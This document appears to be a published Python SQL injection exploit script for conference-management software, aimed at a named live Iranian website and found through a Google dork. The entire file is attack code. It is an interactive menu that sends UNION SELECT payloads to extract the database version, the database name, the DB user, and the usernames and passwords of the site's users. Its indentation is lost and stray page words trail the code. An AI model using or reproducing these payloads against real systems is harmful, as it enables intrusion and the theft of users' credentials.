#!/usr/bin/python3
################################################
# Title: Zaheb.ir | SQL Injection
# Date: 2019-07-23
# Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس)
# Exploit Author: D3trct0r
# Vendor Homepage: http://asanhamayesh.com
# Tested on: GNU/Linux , Windows , FreeBsd , Android
# CWE : CWE-89
################################################
import requests
from bs4 import BeautifulSoup
try:
print ('''\033[31m
███████╗ █████╗ ██╗ ██╗███████╗██████╗ ██╗██████╗
╚══███╔╝██╔══██╗██║ ██║██╔════╝██╔══██╗ ██║██╔══██╗
███╔╝ ███████║███████║█████╗ ██████╔╝ ██║██████╔╝
███╔╝ ██╔══██║██╔══██║██╔══╝ ██╔══██╗ ██║██╔══██╗
███████╗██║ ██║██║ ██║███████╗██████╔╝██╗██║██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝╚═╝ ╚═╝
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
Enter 'help' to show commands
''')
while True:
opt = input ("[root@Zaheb Exploit]# ")
if opt == 'help' :
print ('''
version
database
userdb
usernames
passwords
userpass
exit
''')
elif opt == 'version':
payload = "+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'database':
payload = "+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'userdb':
payload = "+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'usernames':
payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'passwords':
payload = "+union+select+1,2,3,unhex(hex(group_concat(PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'userpass':
payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName,0x3a,PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'exit':
quit()
else:
print ("EXP:",opt,"Command Not Found")
except SystemError:
print ("Please Check Internet....")
Polish
English